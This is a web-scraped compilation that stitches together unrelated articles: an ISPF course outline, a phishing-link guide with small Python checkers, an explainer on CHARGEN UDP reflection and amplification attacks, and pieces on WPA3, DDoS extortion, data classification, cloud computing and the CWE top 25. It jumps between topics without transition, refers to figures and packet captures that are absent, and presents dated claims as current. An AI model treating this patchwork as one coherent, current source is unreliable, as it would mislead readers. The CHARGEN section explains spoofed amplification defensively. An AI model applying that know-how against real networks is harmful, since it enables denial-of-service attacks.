Supply chain professionals are finding this shift hard to deal with, but the intense pressures of the past couple of years motivate them to move forward. I hope that the lessons they learn and share as they transform will, in coming years, be valued and used by us all to reimagine, reinvent, and revitalize information management and knowledge management practices and strengthen or even eliminate our weakest links.
The Managing Data Files and Definitions with ISPF/PDF course explains how to use the ISPF menu options to display the contents of Data Sets and how functions such as; copying, printing, renaming, and deleting are performed on these objects.
Computer operators and trainee programmers or analysts who want a working knowledge of ISPF utilities.
A reasonable understanding of Data Set allocation and familiarity with editing Data Sets.
After completing this course, the student will be able to:
- Use the Common ISPF Utilities
- Create and Manage Data Sets
- List Data Sets
- Identify Data Set and VTOC information
Managing Data Sets Using the ISPF Data Set Utility
- Identify Partitioned and Sequential Data Sets
- Access the Data Set Utility and View Data Set Information
- Allocate, Rename, and Delete Data Sets
Managing Partitioned Data Sets Using the ISPF Library Utility
- Print, Copy, Rename, and Delete Partition Data Set Members Using the Library Utility
The ISPF Copy, Search, and Statistics Utilities
- Copy or Move Data Sets or Members of Data Sets
- Reset and Delete ISPF Statistics
- Search a Data Set or Members of a Data Set for Text Entries
Managing Data Sets Using the DSLIST Utility
- Display Lists of Data Sets and z/OS UNIX Directories and Files Using DSLIST
- Identify and Use the Common DSLIST and TSO Commands in a Data Set List
- Display the VTOC of Specific Volumes
Following a link in an email, text or on certain websites is always a bit of a gamble. On the other end of the link could be the information you want to see, or it could be a malicious website, virus-filled download or inappropriate content.
Of course, we’re talking about phishing attacks. That’s when cybercriminals email, text or post malicious links online hoping to trick victims into clicking them so they can rip them off. These types of attacks have really picked up during the COVID pandemic. Tap or click here to find out why scams are rising.
We always recommend not clicking links found in emails or texts unless you’re 100% sure they’re safe. But even links sent from sources you may trust can be malicious now that scammers are great at spoofing. So how do you know when it’s safe to click? There are some important questions you can ask first that will give you a good idea if the link is safe or not.
1. Where did the link come from?
Perhaps the most important question you can ask is how you got the link in the first place. Was it in an unsolicited email or text message? Did you get it in a Google search? Was it in a friend’s Facebook post?
As a rule, if a link is unsolicited, you don’t want to click on it. Hackers send out malicious links in emails and texts daily. They’re especially good at putting links in emails that look like they’re from legitimate companies. If the link is from someone you know, check with them first to make sure they really sent it, and that their account wasn’t hacked.
Links you find for yourself are going to be safer, but you still need to be cautious. A Google search is a good example. Hackers use a tactic called “search engine poisoning” to get malicious links to the top of a Google search for popular words and topics.
The same goes for Facebook. In general, links your friends post are going to be OK, but one of them might have been tricked into sharing a malicious link, or they installed an app that does it for them. Keep reading and we’ll look at some other questions that will help reveal those dangers.
2. Why am I clicking the link?
OK, this question sounds philosophical, but we’re not actually asking “why” you do things in the general metaphysical sense. We’re asking you why you want to click on that particular link.
Is it out of fear that something bad will happen if you don’t? Are you responding to greed or anger? Is it out of lust? These are just a few of the triggers that hackers use to trick you into clicking.
For example, an email might say your bank account has been hacked and you need to click right away and enter your information so the bank can get your money back. Maybe you see a post on Facebook saying you could win the lottery or get a brand new expensive tech gadget for free.
Perhaps it’s a political post that asks you to sign a petition against something that makes you angry. And don’t forget the ever-popular promise of racy images or video on the other side of a link.
If you find yourself on the verge of reacting out of emotion, take a second and really think about why you’re doing what you’re doing. You might realize that you’re being manipulated. And we’re about to tell you how you can know for sure.
3. Does the link look right?
Web links follow certain rules. That means you can often tell at a glance if one is on the up-and-up. The biggest tip-off is the domain name. For example, the domain name of my site is “komando.com.”
It might have a prefix, such as “www.komando.com,” “news.komando.com,” or “station-finder.komando.com.” Or it might have a suffix, such as “komando.com/how-tos” or “komando.com/news.” But no matter what, “komando.com” is going to be the centerpiece of any link on our site.
So, if you got an email claiming to be from Komando but the link was “www.somethingelse.com/this-is-fake” or even “komando.somethingelse.com/also-fake” or “somethingelse.com/komando,” you know something is up.
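The domain rule described above can be checked mechanically. A minimal Python sketch (simplified for illustration: real checks must also handle lookalike characters and public-suffix rules such as "co.uk"):

```python
from urllib.parse import urlparse

def belongs_to_domain(url: str, domain: str) -> bool:
    """True when the URL's host is the domain itself or a subdomain of it."""
    host = (urlparse(url).hostname or "").lower()
    domain = domain.lower()
    return host == domain or host.endswith("." + domain)

print(belongs_to_domain("https://news.komando.com/article", "komando.com"))       # True
print(belongs_to_domain("https://komando.somethingelse.com/fake", "komando.com")) # False
print(belongs_to_domain("https://somethingelse.com/komando", "komando.com"))      # False
```

Note the last two cases: putting the trusted name in a subdomain or in the path does not make the link belong to the trusted site.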
Sometimes this can get a little tricky. For example, Google's shortening service is "goo.gl," but on the whole, it's a good thing to check. However, there are a few more tricks hackers like to pull.
Earlier, we mentioned search engine poisoning where hackers get malicious links to the top of a search results page. If you’re doing a Google search, look just below the page title in the search results to see where the link is coming from. If you’re looking for a page on one company’s site, and the link is to another site, then proceed with caution.
Another trick is that the text of a link and the link itself doesn’t have to be the same. In an email or online, you can hover your mouse cursor over a link and then look down in the lower part of the screen to see what the link really is. You can also right-click on the link, choose “Copy link” or “Copy link address” and paste the link into a word processor to see what it really is.
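The hover trick works because a link's visible text and its actual destination are stored separately in the HTML. A Python sketch using the standard library's HTML parser to surface such mismatches (the example addresses are invented):

```python
from html.parser import HTMLParser

class LinkAuditor(HTMLParser):
    """Collect (visible text, actual href) pairs so mismatches stand out."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, ""

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = ""

    def handle_data(self, data):
        if self._href is not None:
            self._text += data

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._text.strip(), self._href))
            self._href = None

auditor = LinkAuditor()
auditor.feed('<a href="http://evil.example/steal">https://www.komando.com</a>')
text, href = auditor.links[0]
print(text == href)  # False: the displayed address is not where the link goes
```

This is the same comparison your eyes make when hovering, just done programmatically: when the text looks like one address but the href points somewhere else, treat the link as hostile.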
Sometimes you'll run into shortened links, especially on Facebook and Twitter. These are often legitimate links, but they will just show something like bit.ly/123456, goo.gl/123456 or t.co/123456.
In general, as long as the person posting them is legitimate, you’re OK. If it’s a random account you stumbled on that doesn’t have a lot of followers or is posting nonsensical information, be more cautious. Of course, sometimes it helps to get a second opinion.
4. Is there a second opinion?
Sometimes when you’re in a rush, you don’t always check links as thoroughly as you should. Or maybe you think a link in a Google search or on a website is bad, but you aren’t sure.
Most security companies have software that watches links and lets you know if they don’t go where you think, or if other people have reported them as being a problem. Check your security software to see if it has a URL reputation system you can enable in your browser, as most do.
5. What’s on the other side?
If you’re even a little suspicious of a link, you shouldn’t click on it. Better safe than sorry. And if it’s information you really need, you can usually visit a company’s site directly to find it, or look it up in a Google search.
However, sometimes you’ll click on a link and wind up in a place that sets off red flags. Maybe the site isn’t the company site you were expecting; it might look like it was thrown together, or it could pester you to enter information you know you shouldn’t give out.
Remember, it’s always OK to walk away. Close the browser tab and go find the information somewhere else.
Deep inside CHARGEN flood attacks
The CHARGEN protocol, also known as the Character Generator Protocol, is a network service defined in 1983. Its specifications are laid out in RFC 864. The protocol was developed to simplify testing, troubleshooting, and evaluating networks and applications. It is based on the simple idea of providing a service that can be accessed by both TCP and UDP (via port 19). If the service is accessed, it will use that connection to send a random number of random characters (data).
Unfortunately, the implementation of the protocol carries several security risks. The service is used relatively infrequently nowadays but is often still available, for example on older Windows servers, Windows desktop PCs, printers and home routers.
CHARGEN flood attacks exploit these remaining CHARGEN protocol points of contact. The most common type of these attacks uses CHARGEN as an amplifier for UDP-based attacks using IP spoofing. The attack itself is rather simple: the attacker has their botnet send tens of thousands of CHARGEN requests to one or more publicly accessible systems offering the CHARGEN service. The requests use the UDP protocol and the bots use the target’s IP address as sender IP so that the CHARGEN service’s replies are sent to the target instead of the attacker. That way, tens of thousands of replies are submitted to the target of the attack.
This is what the communication structure looks like (the example has just one bot attacking):
The attacker usually makes use of another feature of the CHARGEN protocol described in the following excerpt from RFC 864:
UDP Based Character Generator Service
Another character generator service is defined as a datagram based application on UDP. A server listens for UDP datagrams on UDP port 19. When a datagram is received, an answering datagram is sent containing a random number (between 0 and 512) of characters (the data in the received datagram is ignored).
There is no history or state information associated with the UDP version of this service, so there is no continuity of data from one answering datagram to another.
The service only send one datagram in response to each received datagram, so there is no concern about the service sending data faster than the user can process it.
CHARGEN flood attacks can be dangerous
The content of the requests to the CHARGEN service are ignored, and replies of random length are sent – the default for replies is between 0 and 512 characters (bytes). However, replies containing 1024 bytes are possible as well. That way, a request with a content of 1 byte may result in a reply of 512 bytes or more. This is referred to as an amplification by a factor of 512 in terms of payload. This means that an attacker need only send a small fraction of the data volume that will actually hit the target. Simply put, a bot with a bandwidth of 10 Mbps can perform an attack at over 5 Gbps – and an entire botnet can generate attacks ranging in the hundreds of Gbps.
The following CHARGEN request with a corresponding reply should demonstrate the principle of amplification very well (no layer-2 and layer-3 header shown):
In terms of payload, this means an amplification factor of 1024. The request is made up of 1 byte of data but the reply of 1024 bytes. Looking at the packet, a request packet of 60 bytes results in a reply packet of 1066 bytes, an amplification factor of 17-18.
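The arithmetic behind these amplification figures is straightforward. A small Python sketch using the byte counts from the example above:

```python
def amplification_factor(request_bytes: int, reply_bytes: int) -> float:
    """Bandwidth amplification: bytes reflected at the victim per byte the bot sends."""
    return reply_bytes / request_bytes

# Payload view: 1 byte of request data triggers 1024 bytes of reply data.
print(amplification_factor(1, 1024))             # 1024.0
# Whole-packet view: a 60-byte request packet triggers a 1066-byte reply packet.
print(round(amplification_factor(60, 1066), 1))  # 17.8
```

The gap between the two numbers is the fixed per-packet overhead (headers), which is why payload-level factors always look more dramatic than packet-level ones.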
This is what the botnet communication looks like including amplification:
Potential threats that can occur
The target faces several threats:
- Internet connection overload
- DDoS attacks
- Overload of the components processing the packets
The worst possible outcome of this type of attack is complete failure of the target's internet connection. Be prepared and get reliable protection now.
The way we connect to the Internet will change forever. We all know about Wi-Fi. It is a wireless networking protocol that lets all of our devices connect to the Internet without any cords. Most people have a Wi-Fi connection in their homes or at work. Most restaurants, coffee shops, and hotels offer this form of connectivity as well. But this technology hasn’t changed since 2004—until now.
In 1971, the Hawaiian Islands were connected through ALOHAnet, a UHF wireless packet network that later inspired Ethernet. But the beginning of Wi-Fi technology as we know it today came from Vic Hayes, often referred to as the "father of Wi-Fi." Hayes chaired the IEEE committee that created the 802.11 standard, the first version of which was released in 1997.
In 1999, a faster version was released called 802.11a. This version had a speed of 54 megabits per second, but had limited range and was very expensive. Soon after, 802.11b was released and had a greater range than its predecessor, and it was a more affordable version for the masses. Wireless networking became very popular and a group of companies created the Wireless Ethernet Compatibility Alliance (WECA). This organization tested wireless equipment aiming to advance the technology. In 2002, the term Wi-Fi (a combination of Wireless and Hi-Fi) was coined, and WECA changed their name to the Wi-Fi Alliance.
A new, improved Wi-Fi standard is important because we all want faster internet speeds and, maybe more importantly, we all want to protect our information.
Just recently, a weakness in Wi-Fi connectivity was exposed. A researcher from Belgium found that a hacker within range of a WPA2-protected network could intercept your internet traffic and view your information by exploiting a flaw in the protocol's handshake. This was called the "Key Reinstallation Attack," or KRACK. Even changing your Wi-Fi password does not stop it, because KRACK targets the protocol itself rather than the password.
Public Wi-Fi is probably one of the most unsafe connections there are. Anytime you use a Wi-Fi in a coffee shop, restaurant, or hotel, you are susceptible to attacks. Most of these places use an unencrypted network, which hackers can easily get into. No matter where you are, you should try not to use a public Wi-Fi network. If you are looking for extra security, using a Virtual Private Network can help you protect yourself even further.
Here is how to quickly check what type of security your current connection has:
Windows: Click on the wireless indicator at the bottom right corner of your screen. Choose the network you are connected to and you will see what type of encryption under Security Type.
Mac: Click on the Apple logo on the top left corner. Click on System Preferences and select Network. Click on the Advanced option on the bottom right corner. And you will see what type of encryption listed as Security under the Wi-Fi tab.
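Linux, or any scripted check: the same information can be read from the command line. A minimal sketch that parses NetworkManager's `nmcli` output — the tool may not be installed everywhere, so the sample output below is illustrative and used as a fallback:

```python
import subprocess

# Illustrative sample of `nmcli -f SSID,SECURITY dev wifi` output;
# "--" in the SECURITY column means an open, unencrypted network.
SAMPLE = """\
SSID       SECURITY
HomeNet    WPA2
CafeWifi   --
OfficeNet  WPA2 WPA3
"""

def wifi_security(output: str) -> dict:
    """Map SSID -> security type from nmcli-style columnar output."""
    result = {}
    for line in output.strip().splitlines()[1:]:  # skip the header row
        parts = line.split(None, 1)
        ssid = parts[0]
        sec = parts[1].strip() if len(parts) > 1 else "--"
        result[ssid] = "open (unencrypted)" if sec == "--" else sec
    return result

try:
    out = subprocess.run(
        ["nmcli", "-f", "SSID,SECURITY", "dev", "wifi"],
        capture_output=True, text=True, check=True,
    ).stdout
except (FileNotFoundError, subprocess.CalledProcessError):
    out = SAMPLE  # nmcli not available here; fall back to the sample

print(wifi_security(out))
```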
The Wi-Fi Alliance recently introduced a new protocol, Wi-Fi Certified WPA3, which will be the successor of the WPA2 Wi-Fi that we have all become accustomed to. According to the Wi-Fi Alliance, the next generation of Wi-Fi will be an upgrade to the older protocol focusing on new enhancements regarding security, primarily a stronger authentication system, and increased cryptographic capacities.
There will be two different types of WPA3 operations: a personal mode and an enterprise mode.
WPA3-Personal is the mode that most of us will be using. It brings an upgraded password-based authentication system built on Simultaneous Authentication of Equals (SAE), which helps prevent hackers from breaking into your Wi-Fi connection and makes repeated, offline password-guessing attacks much harder.
WPA3-Enterprise will most likely be used by governments and financial companies. This mode offers a stronger security system than the personal version, with strength comparable to 192-bit cryptography, ensuring the highest level of security for internet connectivity.
The switch to the new Wi-Fi protocol won't happen suddenly. It may actually take a couple of years for all of us to be fully migrated. First off, WPA3-capable hardware is needed: we will all need routers that support WPA3, and our gadgets need to support the new protocol as well. Luckily, new devices that support WPA3 will still support the older WPA2 too.
Preparing for adoption of the new protocol, Intel has announced that it will have chipsets ready for the new advancement in internet connectivity. The WPA3-compatible 802.11ax promises faster speeds than its predecessor, 802.11ac – Intel claims peak data rates up to 40 percent higher, to be exact, along with an improvement of at least four times in congested areas.
This is great timing because many homes are incorporating more smart devices. The need for faster connectivity is crucial in a connected home. The performance capabilities between the new 802.11ax along with the new WPA3 protocol should help bring us into the age of high-performance connectedness.
The new advancements in internet connectivity will be welcome news for everyone, since we haven't seen an update to the WPA protocol since 2004. Our personal information, and the security of that information, is important to everyone. We live in a time where hackers are becoming smarter, so our systems need to become more intelligent as well. The Wi-Fi Alliance's WPA3 update and Intel's 802.11ax support will be faster and more secure than what we have today.
There will come a time when we all need an upgrade from the WPA3 protocol, but until that time comes – this is great news for our security.
Criminal gangs are increasingly using the internet as a tool to extort money from businesses. Thousands of distributed denial of service attacks (DDoS) are occurring globally every day and it is vital that senior management wakes up to the very real risk of such an assault.
The rise of the internet carries a number of threats in the form of viruses, hackers, worms, and malware. Most companies are aware of these risks and have the appropriate processes and technology in place to mitigate them.
But in the last few years these internet-based threats have taken on a more malevolent and sophisticated nature; virus writing is no longer the pastime of teenagers with too much time on their hands – instead, viruses are now being written for organized cyber-criminals motivated only by money.
Extortion – A growing problem
DDoS attacks are launched with the sole aim of crashing a company's website or server by bombarding them with packets of data, usually in the form of web requests or emails.
Unlike single source attacks (which can be stopped relatively easily), the attacker compromises a number of host computers which, in turn, infect thousands of other computers that then operate as agents for the assault.
These infected host computers, known as 'zombies' or 'bots', then start flooding the victim's website with requests for information – creating a vast and continuous stream of data that overwhelms the target website, thus preventing it from providing any service.
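The aggregate effect of thousands of such 'zombies' can be sketched with a toy capacity model (all rates here are invented for illustration):

```python
# Toy model: a server that can handle `capacity` requests per second and
# drops everything beyond that. As the botnet's aggregate rate grows,
# legitimate requests are crowded out.

def served_fraction(legit_rps: int, attack_rps: int, capacity: int) -> float:
    """Fraction of legitimate requests served, assuming the server picks
    requests at random from the combined stream once it is saturated."""
    total = legit_rps + attack_rps
    if total <= capacity:
        return 1.0
    return capacity / total

capacity = 10_000    # requests/second the site can absorb
legit = 500          # normal visitor traffic, requests/second
zombies = 20_000     # compromised hosts in the botnet
per_zombie = 50      # requests/second each zombie sends

frac = served_fraction(legit, zombies * per_zombie, capacity)
print(f"{frac:.1%} of legitimate requests get through")  # 1.0%
```

Even modest per-zombie rates, multiplied across a large botnet, reduce the service to effectively unusable for real visitors.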
Every business is at risk
The cost of a DDoS attack can be substantial and it has been estimated that as many as 10,000 occur worldwide everyday. DDoS extortion attacks were originally used against online gambling sites.
Criminal gangs would initiate attacks that would bring the website down just before a major sporting event, inflicting maximum financial damage. Now, however, DDoS attacks are increasingly being used to extort money from all sorts of businesses.
There are numerous examples of DDoS attacks that can be cited. One of the most well-known occurred early last year: 'MyDoom' infected hundreds of thousands of computers before launching an attack on SCO (a Utah-based Unix vendor) that took the company's website offline for several weeks. The motivation for the attack has never truly been established.
DDoS attacks are a truly global threat as the extortionists are not restrained by traditional borders. Even the Greater Manchester Police have fallen victim to an assault; recently its chief constable was subjected to 2,000 emails an hour in an attempt to crash the force's computer systems.
DDoS attacks are also being used for political purposes. On Valentine's Day this year animal activists set up a chat-room and encouraged people to log on and 'chat' at the same time. For every word typed an email would be sent to the target organizations in the vivisection and fur industries in an effort to crash their websites.
The reality is that no company is safe. The problem is exacerbated by the fact that DDoS attacks do not simply affect the organizations they are targeted at, but can in fact bring down the Internet Service Provider (ISP).
Lack of awareness is making businesses vulnerable
Despite the substantial damage DDoS attacks can cause, research released by IT Company IntY earlier this year has revealed an alarming lack of awareness amongst businesses about the threat posed.
According to IntY, more than half of UK companies are at risk because this lack of understanding has resulted in a widespread failure to implement the necessary preventative technology. It is vital that senior decision makers wake up to the very real threat posed by DDoS attacks. A failure to do so could have far reaching consequences.
All businesses with an online arm should implement the necessary preventative measures to mitigate the threat of a DDoS attack.
Many companies rely on reactive measures such as blackholing, router filters and firewalls, but these methods are either inefficient, not sophisticated enough to protect against cyber-criminals, or can only be configured against specific external sources.
A multi-layered approach to defence
While all these tools do possess crucial security features, they fail to offer sufficient protection against the ever evolving and sophisticated nature of these assaults. If companies are to successfully combat a DDoS attack a truly multi-layered approach to defence must be adopted.
Thus it is vital to establish a solid relationship with your service provider to ensure that you are aware of the measures that are available to protect your network and online business.
Recent research by Arbor Networks revealed that DDoS attacks are the most crippling threat facing ISPs today, yet only 29 per cent of ISPs surveyed offer security and DDoS service levels agreements to their customers.
Because DDoS attacks are launched from thousands of computers around the world it is essential that companies share information about the attacks if they are to be stopped. Such assaults cannot be fought alone and a collaborative effort is vital.
A number of ISPs including Belgacomm, Cable & Wireless and COLT have signed up to Arbor Networks Fingerprint Sharing Alliance which enables them to share detailed attack information in real time and block attacks closer to the source.
Once an attack has been identified by one company, the other ISPs in the Alliance are automatically sent the 'fingerprint', enabling them to quickly identify and remove infected hosts from the network.
This enables businesses and their ISPs to stay abreast of security threats as they arise. The Alliance is helping to break down communication barriers and its rapid growth marks a significant step forward in the fight against cyber-criminals.
The threat of being blackmailed by organized criminals using DDoS attacks is very real and businesses cannot afford to be complacent. Such attacks are capable of bringing even the largest companies to their knees.
However, stand-alone defences are insufficient to combat these attacks and a comprehensive approach to security must be implemented. Not only should a multi-layered security strategy be instilled at enterprise level, but companies must also work with their ISPs to ensure that they too have taken preventative measures.
To put it simply, in order to protect your sensitive data, you need to know exactly what data you are trying to protect. Data classification allows you to categorise information based on how sensitive certain data items are by injecting metadata into documents, emails, etc. This information can be used to alert users about the degree of sensitivity associated with the data they are handling. This is akin to putting a sticker on a box saying “Fragile! Handle with care!”.
This metadata can be used by Data Loss Prevention (DLP) software to ensure that sensitive data is not allowed to be shared outside of the organisation’s network. Likewise, the metadata can be used by specialised encryption software to ensure that sensitive data is automatically encrypted as it moves around the network – both internally and externally. Data classification also allows organisations to store different categories of data in a tiered fashion. For example, important data that needs to be readily available can be automatically moved to high-performance storage. In addition to the performance benefits, it can also help reduce costs, as less important data requires less valuable resources. It is important to think carefully about what data you want to classify. If you choose to classify everything, the costs will be high.
An effective classification system requires a degree of centralised control. Sophisticated auditing solutions such as Lepide Data Security Platform provide an intuitive dashboard to help administrators ensure that the classified data is consistent with the access controls assigned to that data. However, before you start classifying data, it would be a good idea to first start with a full audit, and then build the classification system around the results. Since it is good practice to only store data that you need to store, you may want to consider using a data cleansing application that helps to delete redundant, duplicate or obsolete content. Of course, to have an effective classification system, you will need to educate your staff members about how the system works, and why the system is important.
Classified Data is typically categorised as either public or private. Public information can be accessed by anyone, at any time, and includes things like marriage certificates, birth certificates, criminal records, etc. Private data, as you might expect, is data that you don’t want anyone to view without explicit approval, and includes personally identifiable information (PII), protected health information (PHI), etc.
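In code, the heart of such a scheme is rule-based labelling. A deliberately crude sketch follows – the patterns and labels are invented for the example, and real classification and DLP tooling is far more thorough:

```python
import re

# Hypothetical patterns for two kinds of private data.
PATTERNS = {
    "PII: email address": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "PII: UK NI number": re.compile(r"\b[A-Z]{2}\d{6}[A-D]\b"),
}

def classify(text: str) -> str:
    """Label text 'private' (with reasons) if any sensitive pattern
    matches, else 'public'. In a real system the label would be written
    into the item's metadata for DLP or encryption software to act on."""
    reasons = [name for name, pat in PATTERNS.items() if pat.search(text)]
    return f"private ({', '.join(reasons)})" if reasons else "public"

print(classify("Meeting notes: venue confirmed."))            # public
print(classify("Contact jane.doe@example.com re: payroll."))  # private (PII: email address)
```

The label is the "sticker on the box": downstream tooling never has to re-derive sensitivity, it simply reads the tag.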
Data classification and GDPR
As you may already know, the GDPR will soon come into effect, and when it does, the need for data classification will be greatly increased. Under the GDPR, organisations will need to pay close attention to their data and be able to identify unusual behaviour on their network quickly. They will need to know exactly where their sensitive data is stored, who has access to this data, who should have access to this data, and when this data is being accessed. Again, using real-time event detection and reporting solutions such as Lepide Data Security Platform, answering these questions will be much easier. Likewise, Lepide DSP is capable of generating over 300 pre-defined reports, which can be used to satisfy regulatory compliance requirements with minimal effort.
This article will explain what cloud computing is, define its common variants, and offer some insights into when it is or is not beneficial to your small business.
What are the different types of cloud computing?
The expression 'cloud computing' gets thrown around a lot – but in reality the term is merely an umbrella that encompasses three main types of services: Software as a Service (SaaS), Infrastructure as a Service (IaaS), and Platform as a Service (PaaS). Let's explore each of these in turn:
SaaS (Software as a Service)
Software as a Service is the most common type of cloud computing – in fact, it is highly likely that you're already using one or more of these services! Almost all email services, QuickBooks, Slack (and most competing messaging services as well), Microsoft 365, Canva, Salesforce, and even Netflix are examples of SaaS!
What differentiates these pieces of software from software of yesteryear is that your ability to use them is contingent upon an ongoing subscription.
Some examples of SaaS, like Netflix, operate in such a way that it is difficult to even tell that you're paying for software! Your subscription fees obviously pay for the rights to stream their content, right? But users aren't allowed to stream Netflix through just any app! All Netflix users must use Netflix's proprietary software – and there are no open-source APIs or other video streaming options which connect to their backend.
While some SaaS install to your local drive (such as the Netflix app on your computer or phone), others are available to access and use via your web browser. Netflix is a great example of software that is available both as a downloadable resource, and as a web application.
Increasingly software is being developed as cloud-native services – meaning that they were designed from the ground up with cloud in mind. Services like Canva, a web-based graphic design service, are only available as web applications – and have no downloadable version available to use.
IaaS (Infrastructure as a Service)
Infrastructure as a Service might sound complicated, but it is actually a type of cloud solution quite commonly used by consumers and small businesses. The most common type of IaaS is cloud storage, where instead of using networked hard drives for storage, a web-based storage solution is used. This includes Microsoft's OneDrive, Dropbox, and Google Cloud Storage.
Beyond cloud storage, IaaS includes a variety of other remote computing services like web servers and even entire virtual machines. Microsoft Azure, Amazon AWS (Amazon Web Service), and Google Cloud are the three best known IaaS providers – offering a wide range of virtualization services.
In the past, these remote computing options were of limited utility due to high latency (the time it takes for cloud computers to communicate with your own system), but in recent years high-speed, low-latency connections have become commonplace. All but the most demanding system requirements can now be easily carried out over widely available internet connections.
Unlike SaaS, IaaS puts most of the control within the user’s hands – simply offloading the physical computing power and data storage to data centers. This is handy for small businesses with ‘peaky’ workloads, offering cost effective alternatives to costly physical servers or on-premise storage which may only be fully utilized a small percentage of the time.
PaaS (Platform as a Service)
While IaaS’s give small businesses virtual machines to work with, PaaS’s give companies a virtual machine which is pre-loaded with software. Rather than develop your own ecosystem, a PaaS allows companies to pay by the user, or pay for the resources used, and have access to a complete cloud platform. This cloud environment is hosted remotely, and includes everything from servers to software.
The big names from the IaaS world also are the dominant PaaS providers, and include Microsoft Azure, AWS, and Google Cloud.
Even household consumers are partaking in PaaS services – although many people don’t recognize it as such. Internet of Things (IoT) devices like smart thermostats, doorbells, security cameras, and smoke alarms operate on remote platforms which users are able to access via apps or their web browser. Your Nest thermostat or Ring doorbell isn’t hosting its own server – but is instead living on the cloud!
Where is all of this information hosted?
While all cloud environments host information remotely, how the information is hosted can vary depending upon your company’s needs.
Public Cloud Infrastructure
A public cloud infrastructure is accessible via the internet and offers resources which are shared amongst multiple users. This sort of cloud service, also referred to as a multi-tenant cloud environment, is the cheapest option available, as hardware costs are shared across a large number of end users.
However, as public cloud services are accessible by anyone with an internet connection, there is a greater exposure to risk with this sort of environment. Thankfully, with modern encryption protocols and multi-factor authentication, this risk is generally minimal.
Another benefit of public cloud infrastructure is scalability and elasticity. If your company needs to use more resources, cloud service providers are able to allocate your business more computing resources. This process is effectively invisible to the companies making use of it and generally requires no additional work from the users (although in some cases like cloud storage users may be required to sign up for more storage when they approach their limits).
Private Cloud Infrastructure
Private cloud infrastructures differ from public clouds in that the cloud computing resources are not shared with any other users. These single-tenant cloud environments offer a greater degree of customization and security than public clouds, although those benefits don't come cheap.
The security benefits of private clouds include the ability to implement your own firewalls and DevOps protocols, but companies are responsible for managing their own clouds and will need to hire and maintain a team of IT staff, along with operating the on-premises hardware necessary to run the cloud.
Hybrid Cloud Infrastructure
For many companies a hybrid cloud infrastructure offers the flexibility of public cloud computing alongside the security and control of private cloud services. In a hybrid cloud environment, businesses may use the public cloud to host their SaaS cloud applications, while sensitive data is kept safely on private servers.
When well implemented, the effect of using a multi-cloud environment is seamless and a business’s end users will be able to switch between public and private cloud resources without even noticing the transition.
What are some of the benefits of cloud computing?
Cloud computing offers considerable benefits, including cost savings, protection against depreciation, scalability, accessibility, reduced maintenance, and the ability to access otherwise cost-prohibitive resources.
If your company is currently hosting its software on a local server then you may stand to save money by switching to cloud computing. Servers need to be monitored and maintained by skilled technicians and use a surprising amount of electricity.
Shifts Business Costs
In addition to the costs of running a server, small businesses need to consider the capital expenses related to maintaining a local server. The server itself must be purchased and then immediately begins to depreciate. While servers and mainframes are generally built robustly and age gracefully, if your business rolls out new software or operating systems, older hardware may serve as a performance bottleneck.
Cloud computing helps companies to avoid the gradual decline in performance over time and switches the accounting from one of capital expenses and depreciation to predictable operating expenses.
Scalability
This is one of cloud computing's greatest strengths. When small businesses purchase hardware for their private servers they have to weigh the cost of the hardware against their predicted future requirements. It is generally unwise to purchase oversized equipment, as that extra performance comes at additional cost and will remain unused most of the time.
One option is to simply install upgrades when the time comes, but this can be easier said than done and will involve additional cost and possible downtime as the new system is brought online.
Cloud computing on the other hand suffers from no such limitations. Cloud providers are capable of increasing the amount of resources your company has access to on an as needed basis and offer pricing which will vary in relation to your company’s needs.
An added benefit of this flexibility is that if your company has extremely variable or ‘peaky’ computational needs the cloud environments are able to offer more computing bandwidth on an as-needed basis. For startups who are operating on a tight budget this can provide the capability for high-end processing without the capital expenditure of high-end equipment.
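The break-even logic for a peaky workload can be sketched with hypothetical prices (real cloud and hardware pricing varies widely, so treat every number here as an assumption):

```python
# Hypothetical prices: an on-prem server must be sized (and paid for)
# at peak, while cloud instances are billed only for the hours used.

ON_PREM_MONTHLY = 900.0          # amortized hardware + power + admin
CLOUD_PER_INSTANCE_HOUR = 0.10   # price of one instance-hour

HOURS_IN_MONTH = 730
peak_hours, peak_instances = 40, 8   # a short monthly burst needs 8 instances
base_instances = 1                   # one instance covers the rest

cloud_cost = (peak_hours * peak_instances
              + (HOURS_IN_MONTH - peak_hours) * base_instances) * CLOUD_PER_INSTANCE_HOUR

print(f"on-prem: ${ON_PREM_MONTHLY:.2f}/mo   cloud: ${cloud_cost:.2f}/mo")
# on-prem: $900.00/mo   cloud: $101.00/mo
```

The flatter and more predictable the load, the more that gap narrows – which is why the right answer depends on your company's actual usage profile.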
Ease of Access
A huge advantage of cloud computing is its accessibility. Unlike private servers, public cloud providers offer real-time access from anywhere in the world. In a world where more people are working from home this is almost immeasurably valuable.
A common argument against work-from-home is that employees won’t have access to the resources they need to get the job done – cloud computing offers a solution to this issue.
Another benefit of moving your business’s resources to the cloud is that cloud security is baked in from the start. Whenever companies try to implement remote access to private servers they are introducing an element of danger – but cloud providers have already taken steps to mitigate these risks and generally offer more security than a typical small business is capable of implementing themselves.
Should I move my business to the cloud?
The short answer is: It depends. If you’re considering moving your business to the cloud you should first have a professional take a look at your IT infrastructure and determine where implementing cloud computing will most benefit your business.
For most companies, cloud computing offers at least some degree of benefit. Every use case varies, of course – some businesses may need cloud-based automation, while others might only use the cloud for its disaster mitigation and business continuity assurances.
Whether you’re ready to make the move to the cloud or want to know how you can optimize your existing cloud services, Bristeeri Tech offers managed IT service solutions for small businesses. The time to modernize and move to the cloud is now – don’t miss out on the cost savings, scalability, and flexibility that cloud computing has to offer.
International security organisations have updated and restructured a list of 25 common programming errors that cause security vulnerabilities and expose software users to cyber attack.
The US-funded collaboration project, which is managed by Mitre and the Sans Institute and brings together security experts from more than 30 global organisations, first compiled its list of 25 risky coding practices in January 2009.
The structure of the list has been modified to make it easier to use by distinguishing mitigations and general secure programming principles from more concrete weaknesses, the organisations said.
This year's top 25 entries are prioritised using inputs from more than 20 organisations, which evaluated each weakness based on prevalence and importance.
Cross-site scripting tops the list, which aims to help businesses improve their software procurement by requiring code to be free of these errors.
The goal is to force suppliers to test the security of their software and to provide customers with their test results. No one likes to share test results that show them writing bad code, said Alan Paller, director of research at the Sans Institute.
New York State is changing its procurement language to ensure that the top 25 errors are avoided, with other states expected to follow.
The integrity of hardware and software products is a critical element of cybersecurity, the Office of the Director of US National Intelligence said.
